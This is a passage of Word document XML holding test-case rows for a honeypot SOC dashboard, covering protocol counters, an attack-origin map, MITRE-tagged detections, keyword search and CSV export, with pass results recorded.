              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify protocol counters match the API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator data present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Compare cards with GET /api/stats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Counts equal for all 5 protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Defect: Telnet card showed 0 (key TELNET vs Telnet). Fixed; re-test: SSH 138, Telnet 24, HTTP 14, MQTT 12, RTSP 78 match API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass (after fix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DASH-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the attack-origin map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Attackers geolocated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">View Attack Origins panel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">One marker per attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Markers for all attacker IPs; map tiles load without an API key (OpenStreetMap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass (after fix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DASH-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify detections show severity and MITRE IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">View Threat Detections; press Run Detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/detect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">List with severity badges and technique IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections listed, e.g. MULTI PROTOCOL ATTACK CRITICAL T1046 T1110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DASH-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify full-text search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Events stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Type wget in the search box</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/search?q=wget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Matching commands returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200; 16 events containing wget returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DASH-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify CSV export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
